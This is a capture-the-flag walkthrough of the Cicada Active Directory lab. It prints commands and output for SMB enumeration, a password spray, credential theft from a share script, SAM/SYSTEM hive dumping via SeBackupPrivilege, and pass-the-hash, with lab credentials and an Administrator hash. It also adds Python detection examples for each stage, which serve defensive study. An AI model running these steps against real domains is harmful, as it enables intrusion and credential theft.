Cicada.
Easy
Windows
Active Directory
SMB
Password Spray
secretsdump
Easy Windows Active Directory machine. Anonymous SMB access exposes an HR notice
with a default password. Password spraying identifies the one user who still has
it; with that user's access, a backup script on a share leaks a second user's
credentials, a Backup Operators member, leading to a full domain compromise via
secretsdump.
User Flag
obtained via emily.oscars
Root Flag
obtained via Administrator hash
01 Reconnaissance
Full port scan reveals a standard Windows AD target — DNS, Kerberos, LDAP, SMB, WinRM. Clock skew of +7h noted for any future Kerberos operations.
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.231.149
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap Domain: cicada.htb
445/tcp open microsoft-ds
5985/tcp open http WinRM
|_clock-skew: mean: 7h00m01s
finding: standard AD stack. SMB on 445 and WinRM on 5985 are the primary attack surface. +7h clock skew noted.
02 SMB Enumeration
Anonymous SMB access is enabled. The HR share contains a notice to new hires with a default password in plaintext. The DEV share contains a PowerShell backup script with hardcoded credentials.
$ nxc smb 10.129.231.149 -u guest -p '' --shares
HR READ
DEV READ
IPC$ READ
$ smbclient //10.129.231.149/HR -N
smb: \> get "Notice from HR.txt"
The HR notice reveals the default password for new hires:
Dear new hire!
Your default password is:
Cicada$M6Corpb*@Lp#nZp!8
Please change it on first login.
Now enumerate domain users via RID brute-force to build a spray target list:
$ nxc smb 10.129.231.149 -u guest -p '' --rid-brute
500: CICADA\Administrator
501: CICADA\Guest
502: CICADA\krbtgt
1104: CICADA\john.smoulder
1105: CICADA\sarah.dantelia
1106: CICADA\michael.wrightson
1108: CICADA\david.orelious
1109: CICADA\emily.oscars
finding: 5 domain users enumerated. Default password from HR notice ready to spray.
03 Password Spray
Spray the default password against all enumerated users. Only one account hasn't changed it yet.
$ nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
CICADA\john.smoulder [-] STATUS_LOGON_FAILURE
CICADA\sarah.dantelia [-] STATUS_LOGON_FAILURE
CICADA\michael.wrightson [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
CICADA\david.orelious [-] STATUS_LOGON_FAILURE
CICADA\emily.oscars [-] STATUS_LOGON_FAILURE
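From the defender's side, the spray above leaves a distinctive trace on the domain controller: one source address generating failed logons (event 4625) against many distinct accounts in seconds, then a single success (event 4624). The following is an added detection example, not part of the original writeup; it assumes a simplified `(timestamp, event_id, account, source_ip)` record shape and uses constructed sample records that mimic the spray, alongside a benign user mistyping their own password.

```python
"""Password-spray detection over Windows Security log records (added example).

A spray shows up on the domain controller as one source address producing
failed logons (event 4625) against many distinct accounts in a short window,
often followed by a single success (event 4624) for the account that still
has the default password. This groups failures by source and flags sources
that touch at least `min_accounts` distinct accounts within `window`.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records in a simplified (timestamp, event_id, account, source_ip)
# shape; these are not real log lines from the target. The first group mimics the
# spray in the writeup, the second is a single user mistyping their own password.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:01", 4625, "john.smoulder", "10.10.14.5"),
    ("2024-01-01T10:00:02", 4625, "sarah.dantelia", "10.10.14.5"),
    ("2024-01-01T10:00:03", 4624, "michael.wrightson", "10.10.14.5"),
    ("2024-01-01T10:00:04", 4625, "david.orelious", "10.10.14.5"),
    ("2024-01-01T10:00:05", 4625, "emily.oscars", "10.10.14.5"),
    ("2024-01-01T10:05:00", 4625, "sarah.dantelia", "10.10.20.7"),
    ("2024-01-01T10:05:20", 4625, "sarah.dantelia", "10.10.20.7"),
    ("2024-01-01T10:05:40", 4624, "sarah.dantelia", "10.10.20.7"),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=3):
    """Return {source_ip: {"accounts": [...], "successes": [...]}} for every
    source whose failed logons hit at least `min_accounts` distinct accounts
    within `window`. "successes" lists accounts that also logged on
    successfully from the same source, i.e. the spray's hits."""
    failures = defaultdict(list)   # source_ip -> [(time, account), ...]
    successes = defaultdict(set)   # source_ip -> {account, ...}
    for ts, event_id, account, source_ip in events:
        when = datetime.fromisoformat(ts)
        if event_id == 4625:
            failures[source_ip].append((when, account.lower()))
        elif event_id == 4624:
            successes[source_ip].add(account.lower())

    alerts = {}
    for source_ip, fails in failures.items():
        fails.sort()
        # Slide a window over the failures; the first window that covers
        # enough distinct accounts is enough to raise the alert.
        for i, (start, _) in enumerate(fails):
            accounts = {acct for when, acct in fails[i:] if when - start <= window}
            if len(accounts) >= min_accounts:
                alerts[source_ip] = {
                    "accounts": sorted(accounts),
                    "successes": sorted(successes[source_ip]),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, detail in detect_spray(SAMPLE_EVENTS).items():
        print(f"{ip}: sprayed {len(detail['accounts'])} accounts, hits: {detail['successes']}")
```

The distinct-account count is what separates a spray from a user fumbling their own password; in a real pipeline you would also key on the 4625 sub-status (bad password versus unknown account) and on logon type 3, which is what an SMB spray produces.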
With michael.wrightson credentials, enumerate the DEV share — a PowerShell backup script leaks emily.oscars's password in plaintext:
$ smbclient //10.129.231.149/DEV -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8'
smb: \> get Backup_script.ps1
# Contents:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
credentials: emily.oscars : Q!3@Lp#M6b*7t*Vt
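The backup script leaks a password through a literal handed to `ConvertTo-SecureString -AsPlainText`, a construct that is easy to catch by scanning scripts on shares before an attacker reads them. The scanner below is an added example, not code from the writeup; the regex patterns, the `scan_script` helper and the sample script body (with placeholder values in place of any real credentials) are all constructed here.

```python
"""Scan PowerShell scripts found on file shares for hard-coded credentials
(added example). The patterns cover the construct that leaks a password in
the backup script above (a literal passed to ConvertTo-SecureString
-AsPlainText) plus plain string assignments to password-like variables and
inline -Password arguments. Matched secrets are redacted in the report so the
findings can be shared without re-leaking them.
"""
import re

PATTERNS = {
    # ConvertTo-SecureString "literal" ... -AsPlainText (any parameter order)
    "securestring_literal": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>[^'\"]+)\1(?=.*-AsPlainText)", re.I),
    # $password = "literal"  (also $pass, $passwd, $pwd, $secret)
    "password_assignment": re.compile(
        r"\$(?:pass(?:word|wd)?|pwd|secret)\s*=\s*(['\"])(?P<secret>[^'\"]+)\1", re.I),
    # ... -Password "literal"  (inline credential arguments)
    "inline_password_arg": re.compile(
        r"-Password\s+(['\"])(?P<secret>[^'\"]+)\1", re.I),
}

# Constructed script body modelled on the Backup_script.ps1 pattern above; the
# values are placeholders, not credentials from the target.
SAMPLE_SCRIPT = """\
$sourceDirectory = "C:\\smb"
$destinationDirectory = "D:\\Backup"
$username = "svc_backup"
$password = ConvertTo-SecureString "Placeholder-Secret-1" -AsPlainText -Force
$passwd = 'Placeholder-Secret-2'
$cred = Get-Credential                     # safe: prompts, nothing stored
$key = Read-Host -AsSecureString           # safe: no literal in the file
Copy-Item -Path $sourceDirectory -Destination $destinationDirectory -Recurse
"""


def redact(secret, keep=2):
    """Keep the first `keep` characters so a finding can be matched to the
    file without reproducing the whole secret."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


def scan_script(text, name="<script>"):
    """Return a list of findings {file, line, kind, secret} for each line of
    `text` that matches one of PATTERNS. One finding per matching pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append({
                    "file": name,
                    "line": lineno,
                    "kind": kind,
                    "secret": redact(match.group("secret")),
                })
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_SCRIPT, "Backup_script.ps1"):
        print(f"{f['file']}:{f['line']} {f['kind']} -> {f['secret']}")
```

Run it over every `.ps1`, `.bat` and `.vbs` pulled from readable shares; the two safe forms in the sample (`Get-Credential`, `Read-Host -AsSecureString`) are not flagged, which is the behaviour the script's author should have used in the first place.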
05 Privilege Escalation — Backup Operators → secretsdump
Members of Backup Operators hold SeBackupPrivilege, which lets a process read any file regardless of its ACL, including the SAM and SYSTEM registry hives. Export both hives, pull them back to the attacker machine, and run secretsdump against them offline to extract the Administrator NT hash.
# dump registry hives (SeBackupPrivilege allows this)
*EWR* reg save HKLM\SAM C:\Temp\sam.hive
*EWR* reg save HKLM\SYSTEM C:\Temp\system.hive
# download to attacker
*EWR* download C:\Temp\sam.hive
*EWR* download C:\Temp\system.hive
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator NT hash: 2b87e7c93a3e8a0ea4a581937016f341
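The hive export above is loud if the right telemetry is on: the logon that used emily.oscars's Backup Operators membership gets a 4672 ("Special privileges assigned to new logon") listing SeBackupPrivilege, and the `reg save HKLM\SAM` / `reg save HKLM\SYSTEM` commands appear as process-creation events in that same logon session. The correlation below is an added example, not part of the writeup; the flattened event dictionaries and the `logon_id` values are constructed, and it treats Sysmon event 1 or Security 4688 as the process-creation source.

```python
"""Detect registry hive exports that abuse SeBackupPrivilege (added example).

Two signals are correlated: event 4672 ("Special privileges assigned to new
logon") listing SeBackupPrivilege for a logon session, and a process-creation
event (Sysmon 1 or Security 4688) in that same session whose command line is
`reg save` of the SAM, SYSTEM or SECURITY hive. The hive export is the alert;
the privilege grant is context that tells the analyst how it was possible.
"""
import re

HIVE_EXPORT = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?P<hive>sam|system|security)\b",
    re.IGNORECASE,
)
PROCESS_CREATION_IDS = {1, 4688}

# Constructed events in a flattened form; logon_id ties a 4672 to the processes
# started in that logon session. These are not real records from the target.
SAMPLE_EVENTS = [
    {"event_id": 4672, "logon_id": "0x3e7a1", "account": "CICADA\\emily.oscars",
     "privileges": ["SeBackupPrivilege", "SeRestorePrivilege"]},
    {"event_id": 1, "logon_id": "0x3e7a1", "account": "CICADA\\emily.oscars",
     "command_line": "C:\\Windows\\system32\\reg.exe save HKLM\\SAM C:\\Temp\\sam.hive"},
    {"event_id": 1, "logon_id": "0x3e7a1", "account": "CICADA\\emily.oscars",
     "command_line": 'reg  save "HKLM\\SYSTEM" C:\\Temp\\system.hive'},
    {"event_id": 1, "logon_id": "0x3e7a1", "account": "CICADA\\emily.oscars",
     "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows"},
    {"event_id": 4688, "logon_id": "0x9f9f0", "account": "CICADA\\john.smoulder",
     "command_line": "reg save HKCU\\Software C:\\Temp\\user.hive"},
]


def normalize(command_line):
    """Drop quotes and collapse whitespace so `reg  save "HKLM\\SYSTEM"` and
    `reg.exe save HKLM\\SYSTEM` are matched alike."""
    return " ".join(command_line.replace('"', "").replace("'", "").split())


def detect_hive_export(events):
    """Return one alert per hive-export command line. Each alert records the
    account, the hive, and whether the same logon session had a 4672 that
    listed SeBackupPrivilege."""
    backup_sessions = {
        e["logon_id"]
        for e in events
        if e["event_id"] == 4672 and "SeBackupPrivilege" in e.get("privileges", [])
    }
    alerts = []
    for e in events:
        if e["event_id"] not in PROCESS_CREATION_IDS:
            continue
        m = HIVE_EXPORT.search(normalize(e["command_line"]))
        if not m:
            continue
        alerts.append({
            "account": e["account"],
            "logon_id": e["logon_id"],
            "hive": m.group("hive").upper(),
            "backup_privilege": e["logon_id"] in backup_sessions,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_hive_export(SAMPLE_EVENTS):
        print(f"{a['account']} exported {a['hive']} (SeBackupPrivilege: {a['backup_privilege']})")
```

A legitimate backup service will also trigger 4672 with SeBackupPrivilege, so the privilege alone is not an alert; an interactive or WinRM session exporting SAM and SYSTEM is. The mitigation the writeup implies is the same one this check enforces: keep Backup Operators membership to the accounts that actually run backups, and review it.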
06 Root Flag
Pass-the-Hash with the Administrator NT hash for a full domain shell.
$ evil-winrm -i 10.129.231.149 -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*EWR* type C:\Users\Administrator\Desktop\root.txt
a98dee7************************
chain: SMB guest → HR default password → spray → michael.wrightson → DEV share → emily.oscars creds → Backup Operators → SeBackupPrivilege → secretsdump → Administrator PTH